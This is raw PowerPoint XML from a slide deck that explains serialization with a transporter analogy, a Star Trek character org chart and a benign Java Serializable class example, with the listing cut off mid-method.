          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306313898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4048983"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3739224" y="844649"/>
            <a:ext cx="1545675" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">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gn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="25600" b="1" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25600" b="1" cap="none" spc="0" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32849244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We Typically Think of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>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34261" y="1658939"/>
            <a:ext cx="1953954" cy="1959397"/>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2438" y="3823227"/>
            <a:ext cx="3657600" cy="1645920"/>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26653" y="1658939"/>
            <a:ext cx="2942245" cy="3810208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29421231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t>Think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transporter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Isosceles Triangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061049" y="2484408"/>
            <a:ext cx="2475781" cy="664234"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:scheme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Isosceles Triangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5566913" y="2484408"/>
            <a:ext cx="2475781" cy="664234"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:tint val="50000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="54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U-Turn Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2169549" y="1544128"/>
            <a:ext cx="4904111" cy="940280"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:scheme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1" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1578633" y="2631859"/>
            <a:ext cx="1440611" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901298" y="1829602"/>
            <a:ext cx="1440611" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transmission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6139110" y="2485210"/>
            <a:ext cx="1590158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deserialization</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2457" y="3215078"/>
            <a:ext cx="3512964" cy="2690565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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58540" y="3215078"/>
            <a:ext cx="3491217" cy="2690565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20759951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Serializing an Org </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>chart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072329" y="2303892"/>
            <a:ext cx="3249257" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{Jean-Luc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Picard:None</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> William </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Riker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>:Jean-Luc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Picard,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Tasha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>:Jean-Luc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Picard,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Geordi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Forge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>:Jean-Luc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Picard,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Worf:Tasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Miles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>O’Brien:Geordi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> La Forge}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Diagram 9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4061562116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="401128" y="1841779"/>
          <a:ext cx="4191000" cy="2667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TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974066" y="4512291"/>
            <a:ext cx="3045124" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174395" y="4512291"/>
            <a:ext cx="3045124" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Serialized Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23973574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Serializing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java class</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582288" y="1305224"/>
            <a:ext cx="3036506" cy="4537494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>java.util.ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>import java.io.*;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>orgChart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> implements Serializable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    public class Node implements Serializable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        public String data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;Node&gt; children;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        public Node(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>newData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    	    data = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>newData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>            children = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;Node&gt;();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>addChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(Node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>newChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>children.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>newChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>doTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> cut from here]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>orgChart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>doTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3950908" y="1321795"/>
            <a:ext cx="4675517" cy="4537494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node a = new Node("Jean-Luc Picard");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node b = new Node("William Riker");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node c = new Node("Tasha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Node d = new Node("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Geordi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
